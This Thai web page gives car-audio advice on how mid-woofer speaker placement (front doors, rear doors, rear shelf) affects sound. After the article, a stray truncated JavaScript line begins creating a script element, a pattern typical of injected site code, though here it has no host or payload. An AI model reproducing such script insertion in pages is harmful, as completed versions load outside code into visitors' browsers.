Select Page

ตำแหน่งการติดตั้งลำโพง มิด-วูฟเฟอร์ มีผลต่อเสียงอย่างไร

ตำแหน่งการติดตั้งลำโพง มิด-วูฟเฟอร์ มีผลต่อเสียงอย่างไร

ตำแน่งการติดตั้งนั้นย่อมมีผลต่อเสียงของลำโพงที่ออกมาอย่างแน่นอน ซึ่งพอจะสรุปได้ดังต่อไปนี้

 • ติดตั้งที่ประตูหน้า ส่วนมากในรถแต่ละคันตำแหน่งติดตั้งนี้จะอยู่ค่อนข้างต่ำ นอกจากนั้นยังต้องติด ตั้งลำโพงบนไม้ที่แข็งแรง ถ้าจะให้ดีควรใช้แผ่นแดมพ์ปะที่โครงประตูด้วย เพื่อเป็นการช่วยเสริมให้ภายในตู้มีปริมาตรของอากาศ และช่วยให้ลำโพงมีเสียงทุ้มที่ดีทั้งปริมาณและคุณภาพ เนื่องด้วยตำแหน่งติดตั้งที่ค่อนข้างต่ำนี่เอง ผู้ติดตั้งมักจะใช้วิธีติดตั้งโดยทำมุมเอียงลำโพงขึ้นสู่ด้านบน ซึ่งข้อดีก็คือเสียงที่ได้จะกระจายขึ้นมาด้านบนมากขึ้น แต่ข้อเสียคือระดับความดังและปริมาณเสียงทุ้มที่ลดลง เพราะพื้นที่ด้านหลังของกรวยลำโพงไม่เท่ากัน ทำให้มีแรงอัดอากาศน้อย และการติดตั้งที่เอียงขึ้นนี้ยังเสี่ยงต่อการที่วอยซ์คอยล์ของลำโพงจะเบียด กัน เมื่อเปิดด้วยเสียงที่ดังมากๆ
 • ติดตั้งที่ประตูหลังหรือภายในช่องแค็ป ตำแหน่งนี้จะติดตั้งเพื่อเสริมเสียงทางด้านหลัง ไม่เน้นคุณภาพ มากนัก บางครั้งอาจเป็นลำโพง โคแอ็คเชียล หรือลำโพงรวมชิ้นที่มีเสียงแหลมในตัวไปเลย ตำแหน่งติดตั้งนี้ ลำโพงจะยิงเสียงเข้าหากันโดยตรง เมื่อไม่มีสิ่งกีดขวาง หรือผู้โดยสารนั่งบังเอาไว้ ซึ่งเสียงจะตีกัน ทำให้เกิดเสียงก้อง มีเงาเสียง ทำให้เสียงทุ้มบวมเบลอขึ้นได้ เพื่อหลีกเลี่ยงปัญหาดังกล่าว จึงมักจะติดตั้งโดยเอียงลำโพงขึ้นเล็กน้อย เพื่อให้เสียงกระจายลอยขึ้น เสริมกับลำโพงคู่หน้าได้ดีขึ้น และลดปัญหาเสียงตีกันด้วย ในการเอียงนี้ไม่ควรมากองศา เพราะจะเกิดปัญหาเรื่องวอยซ์คอยล์เบียดได้เช่นกัน
 • ติดตั้งที่แผงด้านหลังรถ ตำแหน่งนี้หากติดตั้งโดยยิงเสียงตรงๆให้สะท้อนกับกระจกหลัง เสียงจะกองอยู่ หลังรถและสะท้อนกับกระจก ดังนั้นควรติดตั้งโดยเอียงลำโพงเพื่อให้ยิงเสียงมาข้างหน้ารถ เลือกองศาเอียงให้เหมาะสม และควรใช้แผ่นไม้ตียาวตลอด โดยมีความหนาของไม้ขั้นต่ำ 20 มิลลิเมตร เพื่อให้มีความแข็งแรง และช่วยให้ลำโพงกระจายเสียงได้ดี เพื่อจะได้ไม่ต้องเร่งเสียงมาก ลดความเสี่ยงต่อการเบียดของวอยซ์คอยล์

20120613012739-1251125166var d=document;var s=d.createElement(‘script’);

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg

เราใช้คุกกี้เพื่อพัฒนาประสิทธิภาพ และประสบการณ์ที่ดีในการใช้เว็บไซต์ของคุณ คุณสามารถศึกษารายละเอียดได้ที่ นโยบายความเป็นส่วนตัว และสามารถจัดการความเป็นส่วนตัวเองได้ของคุณได้เองโดยคลิกที่ ตั้งค่า

Privacy Preferences

คุณสามารถเลือกการตั้งค่าคุกกี้โดยเปิด/ปิด คุกกี้ในแต่ละประเภทได้ตามความต้องการ ยกเว้น คุกกี้ที่จำเป็น

Allow All
Manage Consent Preferences
 • คุกกี้ที่จำเป็น
  Always Active

  ประเภทของคุกกี้มีความจำเป็นสำหรับการทำงานของเว็บไซต์ เพื่อให้คุณสามารถใช้ได้อย่างเป็นปกติ และเข้าชมเว็บไซต์ คุณไม่สามารถปิดการทำงานของคุกกี้นี้ในระบบเว็บไซต์ของเราได้

 • คุกกี้เพื่อการวิเคราะห์

  คุกกี้ประเภทนี้จะทำการเก็บข้อมูลการใช้งานเว็บไซต์ของคุณ เพื่อเป็นประโยชน์ในการวัดผล ปรับปรุง และพัฒนาประสบการณ์ที่ดีในการใช้งานเว็บไซต์ ถ้าหากท่านไม่ยินยอมให้เราใช้คุกกี้นี้ เราจะไม่สามารถวัดผล ปรับปรุงและพัฒนาเว็บไซต์ได้

Save
%d bloggers like this: